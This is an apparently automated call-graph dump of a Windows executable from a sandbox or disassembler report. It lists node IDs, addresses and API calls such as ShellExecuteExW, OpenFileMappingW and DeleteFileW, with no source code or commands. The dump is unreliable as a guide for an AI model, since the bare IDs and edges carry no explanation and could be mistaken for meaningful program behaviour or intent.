22908->22912 22909 4d9bad SetFilePointer 22910 4d9bcd GetLastError 22909->22910 22909->22911 22910->22911 22912->22909 24809 4e9b50 GdipDisposeImage GdipFree __except_handler4 24761 4f8050 8 API calls ___vcrt_uninitialize 24766 4efc60 51 API calls 2 library calls 24768 4f3460 RtlUnwind 24769 4f9c60 71 API calls _free 24770 4d1075 82 API calls pre_c_initialization 24771 4e5c77 121 API calls __vswprintf_c_l 24622 4ed573 24623 4ed580 24622->24623 24624 4dddd1 53 API calls 24623->24624 24625 4ed594 24624->24625 24626 4d400a _swprintf 51 API calls 24625->24626 24627 4ed5a6 SetDlgItemTextW 24626->24627 24628 4eac74 5 API calls 24627->24628 24629 4ed5c3 24628->24629 24630 4ec40e 24631 4ec4c7 24630->24631 24639 4ec42c _wcschr 24630->24639 24632 4ec4e5 24631->24632 24643 4ebe49 _wcsrchr 24631->24643 24665 4ece22 24631->24665 24635 4ece22 18 API calls 24632->24635 24632->24643 24634 4eaa36 ExpandEnvironmentStringsW 24634->24643 24635->24643 24636 4eca8d 24637 4e17ac CompareStringW 24637->24639 24639->24631 24639->24637 24640 4ec11d SetWindowTextW 24640->24643 24643->24634 24643->24636 24643->24640 24644 4f35de 22 API calls 24643->24644 24646 4ebf0b SetFileAttributesW 24643->24646 24651 4ec2e7 GetDlgItem SetWindowTextW SendMessageW 24643->24651 24654 4ec327 SendMessageW 24643->24654 24659 4e17ac CompareStringW 24643->24659 24660 4e9da4 GetCurrentDirectoryW 24643->24660 24662 4da52a 7 API calls 24643->24662 24663 4da4b3 FindClose 24643->24663 24664 4eab9a 76 API calls ___std_exception_copy 24643->24664 24644->24643 24647 4ebfc5 GetFileAttributesW 24646->24647 24658 4ebf25 ___scrt_fastfail 24646->24658 24647->24643 24649 4ebfd7 DeleteFileW 24647->24649 24649->24643 24652 4ebfe8 24649->24652 24651->24643 24653 4d400a _swprintf 51 API calls 24652->24653 24655 4ec008 GetFileAttributesW 24653->24655 24654->24643 24655->24652 24656 4ec01d MoveFileW 24655->24656 24656->24643 24657 4ec035 MoveFileExW 24656->24657 24657->24643 24658->24643 24658->24647 24661 4db4f7 52 API calls 2 library calls 24658->24661 24659->24643 24660->24643 24661->24658 24662->24643 24663->24643 24664->24643 24667 4ece2c ___scrt_fastfail 24665->24667 24666 4ed08a 24666->24632 24667->24666 24668 4ecf1b 24667->24668 24688 4e17ac CompareStringW 24667->24688 24669 4da180 4 API calls 24668->24669 24671 4ecf30 24669->24671 24672 4ecf4f ShellExecuteExW 24671->24672 24689 4db239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24671->24689 24672->24666 24679 4ecf62 24672->24679 24674 4ecf47 24674->24672 24675 4ecf9b 24690 4ed2e6 6 API calls 24675->24690 24676 4ecff1 CloseHandle 24677 4ed00a 24676->24677 24678 4ecfff 24676->24678 24677->24666 24684 4ed081 ShowWindow 24677->24684 24691 4e17ac CompareStringW 24678->24691 24679->24675 24679->24676 24680 4ecf91 ShowWindow 24679->24680 24680->24675 24683 4ecfb3 24683->24676 24685 4ecfc6 GetExitCodeProcess 24683->24685 24684->24666 24685->24676 24686 4ecfd9 24685->24686 24686->24676 24688->24668 24689->24674 24690->24683 24691->24677 24773 4eec0b 28 API calls 2 library calls 24813 4edb0b 19 API calls ___delayLoadHelper2@8 24814 4d1f05 126 API calls __EH_prolog 24774 4eea00 46 API calls 6 library calls 24815 4ebe49 108 API calls 4 library calls 24817 4d6110 80 API calls 24818 4fb710 GetProcessHeap 24712 4d9f2f 24713 4d9f3d 24712->24713 24714 4d9f44 24712->24714 24715 4d9f4a GetStdHandle 24714->24715 24722 4d9f55 24714->24722 24715->24722 24716 4d9fa9 WriteFile 24716->24722 24717 4d9f7c WriteFile 24718 4d9f7a 24717->24718 24717->24722 24718->24717 24718->24722 24720 4da031 24724 4d7061 75 API calls 24720->24724 24722->24713 24722->24716 24722->24717 24722->24718 24722->24720 24723 4d6e18 60 API calls 24722->24723 24723->24722 24724->24713 24775 4d1025 29 API calls pre_c_initialization 24823 4ebe49 103 API calls 4 library calls 24730 4fb731 31 API calls _ValidateLocalCookies 24776 4ea430 73 API calls 24777 4ea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24779 4eeac0 27 API calls pre_c_initialization 24828 4febc1 21 API calls __vsnwprintf_l 24829 4e97c0 10 API calls 24781 4f9ec0 21 API calls 24830 4fb5c0 GetCommandLineA GetCommandLineW 22916 4d10d5 22921 4d5bd7 22916->22921 22922 4d5be1 __EH_prolog 22921->22922 22928 4db07d 22922->22928 22924 4d5bed 22934 4d5dcc GetCurrentProcess GetProcessAffinityMask 22924->22934 22929 4db087 __EH_prolog 22928->22929 22935 4dea80 80 API calls 22929->22935 22931 4db099 22936 4db195 22931->22936 22935->22931 22937 4db1a7 ___scrt_fastfail 22936->22937 22940 4e0948 22937->22940 22943 4e0908 GetCurrentProcess GetProcessAffinityMask 22940->22943 22944 4db10f 22943->22944 22944->22924 22945 4eead2 22946 4eeade ___FrameUnwindToState 22945->22946 22971 4ee5c7 22946->22971 22948 4eeae5 22950 4eeb0e 22948->22950 23051 4eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 22948->23051 22951 4eeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22950->22951 22982 4f824d 22950->22982 22955 4eebad 22951->22955 23052 4f7243 38 API calls 3 library calls 22951->23052 22990 4ef020 22955->22990 22965 4eebd9 22966 4eebe2 22965->22966 23053 4f764a 28 API calls _abort 22965->23053 23054 4ee73e 13 API calls 2 library calls 22966->23054 22970 4eeb2d ___FrameUnwindToState 22972 4ee5d0 22971->22972 23055 4eed5b IsProcessorFeaturePresent 22972->23055 22974 4ee5dc 23056 4f2016 22974->23056 22976 4ee5e1 22981 4ee5e5 22976->22981 23065 4f80d7 22976->23065 22978 4ee5fc 22978->22948 22981->22948 22983 4f8264 22982->22983 22984 4eec4a _ValidateLocalCookies 5 API calls 22983->22984 22985 4eeb27 22984->22985 22985->22970 22986 4f81f1 22985->22986 22988 4f8220 22986->22988 22987 4eec4a _ValidateLocalCookies 5 API calls 22989 4f8249 22987->22989 22988->22987 22989->22951 23194 4ef350 22990->23194 22993 4eebb3 22994 4f819e 22993->22994 23196 4fb290 22994->23196 22996 4f81a7 22998 4eebbc 22996->22998 23200 4fb59a 38 API calls 22996->23200 22999 4ed5d4 22998->22999 23364 4e00cf 22999->23364 23003 4ed5f3 23413 4ea335 23003->23413 23005 4ed5fc 23417 4e13b3 GetCPInfo 23005->23417 23007 4ed606 ___scrt_fastfail 23008 4ed619 GetCommandLineW 23007->23008 23009 4ed628 23008->23009 23010 4ed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23008->23010 23420 4ebc84 23009->23420 23431 4d400a 23010->23431 23016 4ed636 OpenFileMappingW 23019 4ed64f MapViewOfFile 23016->23019 23020 4ed696 CloseHandle 23016->23020 23017 4ed6a0 23425 4ed287 23017->23425 23023 4ed68d UnmapViewOfFile 23019->23023 23024 4ed660 __vswprintf_c_l 23019->23024 23020->23010 23023->23020 23028 4ed287 2 API calls 23024->23028 23030 4ed67c 23028->23030 23029 4e8835 8 API calls 23031 4ed76a DialogBoxParamW 23029->23031 23030->23023 23032 4ed7a4 23031->23032 23033 4ed7bd 23032->23033 23034 4ed7b6 Sleep 23032->23034 23037 4ed7cb 23033->23037 23464 4ea544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23033->23464 23034->23033 23036 4ed7ea DeleteObject 23038 4ed7ff DeleteObject 23036->23038 23039 4ed806 23036->23039 23037->23036 23038->23039 23040 4ed849 23039->23040 23041 4ed837 23039->23041 23461 4ea39d 23040->23461 23465 4ed2e6 6 API calls 23041->23465 23043 4ed83d CloseHandle 23043->23040 23045 4ed883 23046 4f757e GetModuleHandleW 23045->23046 23047 4eebcf 23046->23047 23047->22965 23048 4f76a7 23047->23048 23718 4f7424 23048->23718 23051->22948 23052->22955 23053->22966 23054->22970 23055->22974 23057 4f201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23056->23057 23069 4f310e 23057->23069 23061 4f2031 23062 4f203c 23061->23062 23083 4f314a DeleteCriticalSection 23061->23083 23062->22976 23064 4f2029 23064->22976 23111 4fb73a 23065->23111 23068 4f203f 8 API calls 3 library calls 23068->22981 23070 4f3117 23069->23070 23072 4f3140 23070->23072 23073 4f2025 23070->23073 23084 4f3385 23070->23084 23089 4f314a DeleteCriticalSection 23072->23089 23073->23064 23075 4f215c 23073->23075 23104 4f329a 23075->23104 23077 4f2166 23082 4f2171 23077->23082 23109 4f3348 6 API calls try_get_function 23077->23109 23079 4f217f 23080 4f218c 23079->23080 23110 4f218f 6 API calls ___vcrt_FlsFree 23079->23110 23080->23061 23082->23061 23083->23064 23090 4f3179 23084->23090 23087 4f33bc InitializeCriticalSectionAndSpinCount 23088 4f33a8 23087->23088 23088->23070 23089->23073 23091 4f31ad 23090->23091 23093 4f31a9 23090->23093 23091->23087 23091->23088 23093->23091 23095 4f31cd 23093->23095 23097 4f3219 23093->23097 23094 4f31d9 GetProcAddress 23096 4f31e9 __crt_fast_encode_pointer 23094->23096 23095->23091 23095->23094 23096->23091 23098 4f3241 LoadLibraryExW 23097->23098 23103 4f3236 23097->23103 23099 4f325d GetLastError 23098->23099 23102 4f3275 23098->23102 23100 4f3268 LoadLibraryExW 23099->23100 23099->23102 23100->23102 23101 4f328c FreeLibrary 23101->23103 23102->23101 23102->23103 23103->23093 23105 4f3179 try_get_function 5 API calls 23104->23105 23106 4f32b4 23105->23106 23107 4f32cc TlsAlloc 23106->23107 23108 4f32bd 23106->23108 23108->23077 23109->23079 23110->23082 23114 4fb757 23111->23114 23115 4fb753 23111->23115 23112 4eec4a _ValidateLocalCookies 5 API calls 23113 4ee5ee 23112->23113 23113->22978 23113->23068 23114->23115 23117 4f9e60 23114->23117 23115->23112 23118 4f9e6c ___FrameUnwindToState 23117->23118 23129 4fa3f1 EnterCriticalSection 23118->23129 23120 4f9e73 23130 4fbc39 23120->23130 23122 4f9e82 23128 4f9e91 23122->23128 23143 4f9ce9 29 API calls 23122->23143 23125 4f9e8c 23144 4f9d9f GetStdHandle GetFileType 23125->23144 23127 4f9ea2 ___FrameUnwindToState 23127->23114 23145 4f9ead LeaveCriticalSection _abort 23128->23145 23129->23120 23131 4fbc45 ___FrameUnwindToState 23130->23131 23132 4fbc69 23131->23132 23133 4fbc52 23131->23133 23146 4fa3f1 EnterCriticalSection 23132->23146 23154 4f895a 20 API calls _free 23133->23154 23136 4fbc57 23155 4f8839 26 API calls ___std_exception_copy 23136->23155 23138 4fbca1 23156 4fbcc8 LeaveCriticalSection _abort 23138->23156 23139 4fbc61 ___FrameUnwindToState 23139->23122 23140 4fbc75 23140->23138 23147 4fbb8a 23140->23147 23143->23125 23144->23128 23145->23127 23146->23140 23157 4f85a9 23147->23157 23149 4fbba9 23171 4f84de 23149->23171 23152 4fbbfb 23152->23140 23153 4fbb9c 23153->23149 23164 4fa6ca 23153->23164 23154->23136 23155->23139 23156->23139 23163 4f85b6 _unexpected 23157->23163 23158 4f85f6 23178 4f895a 20 API calls _free 23158->23178 23159 4f85e1 RtlAllocateHeap 23160 4f85f4 23159->23160 23159->23163 23160->23153 23163->23158 23163->23159 23177 4f71ad 7 API calls 2 library calls 23163->23177 23179 4fa458 23164->23179 23167 4fa70f InitializeCriticalSectionAndSpinCount 23170 4fa6fa 23167->23170 23168 4eec4a _ValidateLocalCookies 5 API calls 23169 4fa726 23168->23169 23169->23153 23170->23168 23172 4f84e9 RtlFreeHeap 23171->23172 23173 4f8512 _free 23171->23173 23172->23173 23174 4f84fe 23172->23174 23173->23152 23193 4f895a 20 API calls _free 23174->23193 23176 4f8504 GetLastError 23176->23173 23177->23163 23178->23160 23180 4fa488 23179->23180 23184 4fa484 23179->23184 23180->23167 23180->23170 23181 4fa4a8 23181->23180 23183 4fa4b4 GetProcAddress 23181->23183 23185 4fa4c4 __crt_fast_encode_pointer 23183->23185 23184->23180 23184->23181 23186 4fa4f4 23184->23186 23185->23180 23187 4fa50a 23186->23187 23188 4fa515 LoadLibraryExW 23186->23188 23187->23184 23189 4fa532 GetLastError 23188->23189 23191 4fa54a 23188->23191 23190 4fa53d LoadLibraryExW 23189->23190 23189->23191 23190->23191 23191->23187 23192 4fa561 FreeLibrary 23191->23192 23192->23187 23193->23176 23195 4ef033 GetStartupInfoW 23194->23195 23195->22993 23197 4fb299 23196->23197 23199 4fb2a2 23196->23199 23201 4fb188 23197->23201 23199->22996 23200->22996 23221 4f8fa5 GetLastError 23201->23221 23203 4fb195 23241 4fb2ae 23203->23241 23205 4fb19d 23250 4faf1b 23205->23250 23208 4fb1b4 23208->23199 23211 4fb1f7 23214 4f84de _free 20 API calls 23211->23214 23214->23208 23215 4fb1f2 23274 4f895a 20 API calls _free 23215->23274 23217 4fb23b 23217->23211 23275 4fadf1 26 API calls 23217->23275 23218 4fb20f 23218->23217 23219 4f84de _free 20 API calls 23218->23219 23219->23217 23222 4f8fbb 23221->23222 23223 4f8fc1 23221->23223 23276 4fa61b 11 API calls 2 library calls 23222->23276 23225 4f85a9 _unexpected 20 API calls 23223->23225 23227 4f9010 SetLastError 23223->23227 23226 4f8fd3 23225->23226 23228 4f8fdb 23226->23228 23277 4fa671 11 API calls 2 library calls 23226->23277 23227->23203 23231 4f84de _free 20 API calls 23228->23231 23230 4f8ff0 23230->23228 23232 4f8ff7 23230->23232 23233 4f8fe1 23231->23233 23278 4f8e16 20 API calls _unexpected 23232->23278 23235 4f901c SetLastError 23233->23235 23279 4f8566 38 API calls _abort 23235->23279 23236 4f9002 23238 4f84de _free 20 API calls 23236->23238 23240 4f9009 23238->23240 23240->23227 23240->23235 23242 4fb2ba ___FrameUnwindToState 23241->23242 23243 4f8fa5 _unexpected 38 API calls 23242->23243 23248 4fb2c4 23243->23248 23245 4fb348 ___FrameUnwindToState 23245->23205 23248->23245 23249 4f84de _free 20 API calls 23248->23249 23280 4f8566 38 API calls _abort 23248->23280 23281 4fa3f1 EnterCriticalSection 23248->23281 23282 4fb33f LeaveCriticalSection _abort 23248->23282 23249->23248 23283 4f3dd6 23250->23283 23253 4faf4e 23255 4faf65 23253->23255 23256 4faf53 GetACP 23253->23256 23254 4faf3c GetOEMCP 23254->23255 23255->23208 23257 4f8518 23255->23257 23256->23255 23258 4f8556 23257->23258 23262 4f8526 _unexpected 23257->23262 23294 4f895a 20 API calls _free 23258->23294 23260 4f8541 RtlAllocateHeap 23261 4f8554 23260->23261 23260->23262 23261->23211 23264 4fb350 23261->23264 23262->23258 23262->23260 23293 4f71ad 7 API calls 2 library calls 23262->23293 23265 4faf1b 40 API calls 23264->23265 23268 4fb36f 23265->23268 23266 4fb376 23267 4eec4a _ValidateLocalCookies 5 API calls 23266->23267 23269 4fb1ea 23267->23269 23268->23266 23270 4fb3c0 IsValidCodePage 23268->23270 23273 4fb3e5 ___scrt_fastfail 23268->23273 23269->23215 23269->23218 23270->23266 23271 4fb3d2 GetCPInfo 23270->23271 23271->23266 23271->23273 23295 4faff4 GetCPInfo 23273->23295 23274->23211 23275->23211 23276->23223 23277->23230 23278->23236 23281->23248 23282->23248 23284 4f3df3 23283->23284 23290 4f3de9 23283->23290 23285 4f8fa5 _unexpected 38 API calls 23284->23285 23284->23290 23286 4f3e14 23285->23286 23291 4f90fa 38 API calls __cftof 23286->23291 23288 4f3e2d 23292 4f9127 38 API calls __cftof 23288->23292 23290->23253 23290->23254 23291->23288 23292->23290 23293->23262 23294->23261 23296 4fb0d8 23295->23296 23301 4fb02e 23295->23301 23298 4eec4a _ValidateLocalCookies 5 API calls 23296->23298 23300 4fb184 23298->23300 23300->23266 23305 4fc099 23301->23305 23304 4fa275 __vsnwprintf_l 43 API calls 23304->23296 23306 4f3dd6 __cftof 38 API calls 23305->23306 23307 4fc0b9 MultiByteToWideChar 23306->23307 23309 4fc0f7 23307->23309 23316 4fc18f 23307->23316 23311 4f8518 __onexit 21 API calls 23309->23311 23317 4fc118 __vsnwprintf_l ___scrt_fastfail 23309->23317 23310 4eec4a _ValidateLocalCookies 5 API calls 23312 4fb08f 23310->23312 23311->23317 23319 4fa275 23312->23319 23313 4fc189 23324 4fa2c0 20 API calls _free 23313->23324 23315 4fc15d MultiByteToWideChar 23315->23313 23318 4fc179 GetStringTypeW 23315->23318 23316->23310 23317->23313 23317->23315 23318->23313 23320 4f3dd6 __cftof 38 API calls 23319->23320 23321 4fa288 23320->23321 23325 4fa058 23321->23325 23324->23316 23326 4fa073 __vsnwprintf_l 23325->23326 23327 4fa099 MultiByteToWideChar 23326->23327 23328 4fa0c3 23327->23328 23329 4fa24d 23327->23329 23332 4f8518 __onexit 21 API calls 23328->23332 23335 4fa0e4 __vsnwprintf_l 23328->23335 23330 4eec4a _ValidateLocalCookies 5 API calls 23329->23330 23331 4fa260 23330->23331 23331->23304 23332->23335 23333 4fa12d MultiByteToWideChar 23334 4fa199 23333->23334 23336 4fa146 23333->23336 23361 4fa2c0 20 API calls _free 23334->23361 23335->23333 23335->23334 23352 4fa72c 23336->23352 23340 4fa1a8 23342 4f8518 __onexit 21 API calls 23340->23342 23347 4fa1c9 __vsnwprintf_l 23340->23347 23341 4fa170 23341->23334 23344 4fa72c __vsnwprintf_l 11 API calls 23341->23344 23342->23347 23343 4fa23e 23360 4fa2c0 20 API calls _free 23343->23360 23344->23334 23345 4fa72c __vsnwprintf_l 11 API calls 23348 4fa21d 23345->23348 23347->23343 23347->23345 23348->23343 23349 4fa22c WideCharToMultiByte 23348->23349 23349->23343 23350 4fa26c 23349->23350 23362 4fa2c0 20 API calls _free 23350->23362 23353 4fa458 _unexpected 5 API calls 23352->23353 23354 4fa753 23353->23354 23357 4fa75c 23354->23357 23363 4fa7b4 10 API calls 3 library calls 23354->23363 23356 4fa79c LCMapStringW 23356->23357 23358 4eec4a _ValidateLocalCookies 5 API calls 23357->23358 23359 4fa15d 23358->23359 23359->23334 23359->23340 23359->23341 23360->23334 23361->23329 23362->23334 23363->23356 23466 4ee360 23364->23466 23367 4e0154 23369 4e0484 GetModuleFileNameW 23367->23369 23477 4f70dd 42 API calls 2 library calls 23367->23477 23368 4e00f0 GetProcAddress 23370 4e0109 23368->23370 23371 4e0121 GetProcAddress 23368->23371 23384 4e04a3 23369->23384 23370->23371 23371->23367 23372 4e0133 23371->23372 23372->23367 23374 4e03be 23374->23369 23375 4e03c9 GetModuleFileNameW CreateFileW 23374->23375 23376 4e03fc SetFilePointer 23375->23376 23377 4e0478 CloseHandle 23375->23377 23376->23377 23378 4e040c ReadFile 23376->23378 23377->23369 23378->23377 23381 4e042b 23378->23381 23381->23377 23383 4e0085 2 API calls 23381->23383 23382 4e04d2 CompareStringW 23382->23384 23383->23381 23384->23382 23385 4e0508 GetFileAttributesW 23384->23385 23386 4e0520 23384->23386 23468 4dacf5 23384->23468 23471 4e0085 23384->23471 23385->23384 23385->23386 23387 4e052a 23386->23387 23390 4e0560 23386->23390 23389 4e0542 GetFileAttributesW 23387->23389 23391 4e055a 23387->23391 23388 4e066f 23412 4e9da4 GetCurrentDirectoryW 23388->23412 23389->23387 23389->23391 23390->23388 23392 4dacf5 GetVersionExW 23390->23392 23391->23390 23393 4e057a 23392->23393 23394 4e05e7 23393->23394 23395 4e0581 23393->23395 23396 4d400a _swprintf 51 API calls 23394->23396 23397 4e0085 2 API calls 23395->23397 23398 4e060f AllocConsole 23396->23398 23399 4e058b 23397->23399 23400 4e061c GetCurrentProcessId AttachConsole 23398->23400 23401 4e0667 ExitProcess 23398->23401 23402 4e0085 2 API calls 23399->23402 23481 4f35b3 23400->23481 23404 4e0595 23402->23404 23478 4dddd1 23404->23478 23405 4e063d GetStdHandle WriteConsoleW Sleep FreeConsole 23405->23401 23408 4d400a _swprintf 51 API calls 23409 4e05c3 23408->23409 23410 4dddd1 53 API calls 23409->23410 23411 4e05d2 23410->23411 23411->23401 23412->23003 23414 4e0085 2 API calls 23413->23414 23415 4ea349 OleInitialize 23414->23415 23416 4ea36c GdiplusStartup SHGetMalloc 23415->23416 23416->23005 23418 4e13d7 IsDBCSLeadByte 23417->23418 23418->23418 23419 4e13ef 23418->23419 23419->23007 23422 4ebc8e 23420->23422 23421 4ebda4 23421->23016 23421->23017 23422->23421 23423 4e179d CharUpperW 23422->23423 23506 4decad 80 API calls ___scrt_fastfail 23422->23506 23423->23422 23426 4ee360 23425->23426 23427 4ed294 SetEnvironmentVariableW 23426->23427 23429 4ed2b7 23427->23429 23428 4ed2df 23428->23010 23429->23428 23430 4ed2d3 SetEnvironmentVariableW 23429->23430 23430->23428 23507 4d3fdd 23431->23507 23434 4eaded LoadBitmapW 23435 4eae0e 23434->23435 23436 4eae15 23434->23436 23541 4e9e1c FindResourceW 23435->23541 23438 4eae1b GetObjectW 23436->23438 23439 4eae2a 23436->23439 23438->23439 23536 4e9d1a 23439->23536 23442 4eae80 23453 4dd31c 23442->23453 23443 4eae5c 23557 4e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23443->23557 23444 4e9e1c 13 API calls 23446 4eae4d 23444->23446 23446->23443 23448 4eae53 DeleteObject 23446->23448 23447 4eae64 23558 4e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23447->23558 23448->23443 23450 4eae6d 23559 4e9f5d 8 API calls ___scrt_fastfail 23450->23559 23452 4eae74 DeleteObject 23452->23442 23570 4dd341 23453->23570 23455 4dd328 23610 4dda4e GetModuleHandleW FindResourceW 23455->23610 23458 4e8835 23709 4ee24a 23458->23709 23462 4ea3cc GdiplusShutdown CoUninitialize 23461->23462 23462->23045 23464->23037 23465->23043 23467 4e00d9 GetModuleHandleW 23466->23467 23467->23367 23467->23368 23469 4dad09 GetVersionExW 23468->23469 23470 4dad45 23468->23470 23469->23470 23470->23384 23472 4ee360 23471->23472 23473 4e0092 GetSystemDirectoryW 23472->23473 23474 4e00aa 23473->23474 23475 4e00c8 23473->23475 23476 4e00bb LoadLibraryW 23474->23476 23475->23384 23476->23475 23477->23374 23483 4dddff 23478->23483 23482 4f35bb 23481->23482 23482->23405 23482->23482 23489 4dd28a 23483->23489 23486 4dddfc 23486->23408 23487 4dde22 LoadStringW 23487->23486 23488 4dde39 LoadStringW 23487->23488 23488->23486 23494 4dd1c3 23489->23494 23491 4dd2a7 23492 4dd2bc 23491->23492 23502 4dd2c8 26 API calls 23491->23502 23492->23486 23492->23487 23495 4dd1de 23494->23495 23501 4dd1d7 _strncpy 23494->23501 23497 4dd202 23495->23497 23503 4e1596 WideCharToMultiByte 23495->23503 23500 4dd233 23497->23500 23504 4ddd6b 50 API calls __vsnprintf 23497->23504 23505 4f58d9 26 API calls 3 library calls 23500->23505 23501->23491 23502->23492 23503->23497 23504->23500 23505->23501 23506->23422 23508 4d3ff4 __vswprintf_c_l 23507->23508 23511 4f5759 23508->23511 23514 4f3837 23511->23514 23515 4f385f 23514->23515 23516 4f3877 23514->23516 23531 4f895a 20 API calls _free 23515->23531 23516->23515 23517 4f387f 23516->23517 23519 4f3dd6 __cftof 38 API calls 23517->23519 23522 4f388f 23519->23522 23520 4f3864 23532 4f8839 26 API calls ___std_exception_copy 23520->23532 23533 4f3da1 20 API calls 2 library calls 23522->23533 23523 4eec4a _ValidateLocalCookies 5 API calls 23525 4d3ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23523->23525 23525->23434 23526 4f3907 23534 4f4186 51 API calls 4 library calls 23526->23534 23529 4f3912 23535 4f3e59 20 API calls _free 23529->23535 23530 4f386f 23530->23523 23531->23520 23532->23530 23533->23526 23534->23529 23535->23530 23560 4e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23536->23560 23538 4e9d21 23539 4e9d2d 23538->23539 23561 4e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23538->23561 23539->23442 23539->23443 23539->23444 23542 4e9e3e SizeofResource 23541->23542 23543 4e9e70 23541->23543 23542->23543 23544 4e9e52 LoadResource 23542->23544 23543->23436 23544->23543 23545 4e9e63 LockResource 23544->23545 23545->23543 23546 4e9e77 GlobalAlloc 23545->23546 23546->23543 23547 4e9e92 GlobalLock 23546->23547 23548 4e9f21 GlobalFree 23547->23548 23549 4e9ea1 __vswprintf_c_l 23547->23549 23548->23543 23550 4e9ea9 CreateStreamOnHGlobal 23549->23550 23551 4e9f1a GlobalUnlock 23550->23551 23552 4e9ec1 23550->23552 23551->23548 23562 4e9d7b GdipAlloc 23552->23562 23555 4e9eef GdipCreateHBITMAPFromBitmap 23556 4e9f05 23555->23556 23556->23551 23557->23447 23558->23450 23559->23452 23560->23538 23561->23539 23563 4e9d9a 23562->23563 23564 4e9d8d 23562->23564 23563->23551 23563->23555 23563->23556 23566 4e9b0f 23564->23566 23567 4e9b37 GdipCreateBitmapFromStream 23566->23567 23568 4e9b30 GdipCreateBitmapFromStreamICM 23566->23568 23569 4e9b3c 23567->23569 23568->23569 23569->23563 23571 4dd34b _wcschr __EH_prolog 23570->23571 23572 4dd37a GetModuleFileNameW 23571->23572 23573 4dd3ab 23571->23573 23574 4dd394 23572->23574 23612 4d99b0 23573->23612 23574->23573 23577 4dd407 23623 4f5a90 26 API calls 3 library calls 23577->23623 23579 4e3781 76 API calls 23581 4dd3db 23579->23581 23581->23577 23581->23579 23594 4dd627 23581->23594 23582 4dd41a 23624 4f5a90 26 API calls 3 library calls 23582->23624 23584 4dd563 23584->23594 23649 4d9d30 77 API calls 23584->23649 23588 4dd57d ___std_exception_copy 23589 4d9bf0 80 API calls 23588->23589 23588->23594 23592 4dd5a6 ___std_exception_copy 23589->23592 23591 4dd42c 23591->23584 23591->23594 23625 4d9e40 23591->23625 23640 4d9bf0 23591->23640 23648 4d9d30 77 API calls 23591->23648 23592->23594 23607 4dd5b2 ___std_exception_copy 23592->23607 23650 4e137a MultiByteToWideChar 23592->23650 23633 4d9653 23594->23633 23595 4dd72b 23651 4dce72 76 API calls 23595->23651 23597 4dda0a 23656 4dce72 76 API calls 23597->23656 23599 4dd9fa 23599->23455 23600 4dd771 23652 4f5a90 26 API calls 3 library calls 23600->23652 23602 4dd742 23602->23600 23605 4e3781 76 API calls 23602->23605 23603 4dd78b 23653 4f5a90 26 API calls 3 library calls 23603->23653 23605->23602 23606 4e1596 WideCharToMultiByte 23606->23607 23607->23594 23607->23595 23607->23597 23607->23599 23607->23606 23654 4ddd6b 50 API calls __vsnprintf 23607->23654 23655 4f58d9 26 API calls 3 library calls 23607->23655 23611 4dd32f 23610->23611 23611->23458 23613 4d99ba 23612->23613 23614 4d9a39 CreateFileW 23613->23614 23615 4d9a59 GetLastError 23614->23615 23616 4d9aaa 23614->23616 23657 4db66c 23615->23657 23618 4d9ae1 23616->23618 23619 4d9ac7 SetFileTime 23616->23619 23618->23581 23619->23618 23620 4d9a79 23620->23616 23621 4d9a7d CreateFileW GetLastError 23620->23621 23622 4d9aa1 23621->23622 23622->23616 23623->23582 23624->23591 23626 4d9e64 SetFilePointer 23625->23626 23627 4d9e53 23625->23627 23628 4d9e9d 23626->23628 23629 4d9e82 GetLastError 23626->23629 23627->23628 23670 4d6fa5 75 API calls 23627->23670 23628->23591 23629->23628 23631 4d9e8c 23629->23631 23631->23628 23671 4d6fa5 75 API calls 23631->23671 23634 4d9677 23633->23634 23639 4d9688 23633->23639 23635 4d968a 23634->23635 23636 4d9683 23634->23636 23634->23639 23677 4d96d0 23635->23677 23672 4d9817 23636->23672 23639->23455 23642 4d9bfc 23640->23642 23644 4d9c03 23640->23644 23642->23591 23643 4d9c9e 23643->23642 23704 4d6f6b 75 API calls 23643->23704 23644->23642 23644->23643 23646 4d9cc0 23644->23646 23692 4d984e 23644->23692 23646->23642 23647 4d984e 5 API calls 23646->23647 23647->23646 23648->23591 23649->23588 23650->23607 23651->23602 23652->23603 23653->23594 23654->23607 23655->23607 23656->23599 23658 4db679 23657->23658 23666 4db683 23658->23666 23667 4db806 CharUpperW 23658->23667 23660 4db692 23668 4db832 CharUpperW 23660->23668 23662 4db6a1 23663 4db71c GetCurrentDirectoryW 23662->23663 23664 4db6a5 23662->23664 23663->23666 23669 4db806 CharUpperW 23664->23669 23666->23620 23667->23660 23668->23662 23669->23666 23670->23626 23671->23628 23673 4d9824 23672->23673 23674 4d9820 23672->23674 23673->23674 23683 4da12d 23673->23683 23674->23639 23679 4d96fa 23677->23679 23680 4d96dc 23677->23680 23678 4d9719 23678->23639 23679->23678 23691 4d6e3e 74 API calls 23679->23691 23680->23679 23681 4d96e8 CloseHandle 23680->23681 23681->23679 23684 4ee360 23683->23684 23685 4da13a DeleteFileW 23684->23685 23686 4da14d 23685->23686 23687 4d984c 23685->23687 23688 4db66c 2 API calls 23686->23688 23687->23639 23689 4da161 23688->23689 23689->23687 23690 4da165 DeleteFileW 23689->23690 23690->23687 23691->23678 23693 4d985c GetStdHandle 23692->23693 23694 4d9867 ReadFile 23692->23694 23693->23694 23695 4d9880 23694->23695 23701 4d98a0 23694->23701 23705 4d9989 23695->23705 23697 4d9887 23698 4d98a8 GetLastError 23697->23698 23699 4d98b7 23697->23699 23700 4d9895 23697->23700 23698->23699 23698->23701 23699->23701 23703 4d98c7 GetLastError 23699->23703 23702 4d984e GetFileType 23700->23702 23701->23644 23702->23701 23703->23700 23703->23701 23704->23642 23706 4d998f 23705->23706 23707 4d9992 GetFileType 23705->23707 23706->23697 23708 4d99a0 23707->23708 23708->23697 23714 4ee24f ___std_exception_copy 23709->23714 23710 4e8854 23710->23029 23714->23710 23715 4f71ad 7 API calls 2 library calls 23714->23715 23716 4eecce RaiseException __CxxThrowException@8 new 23714->23716 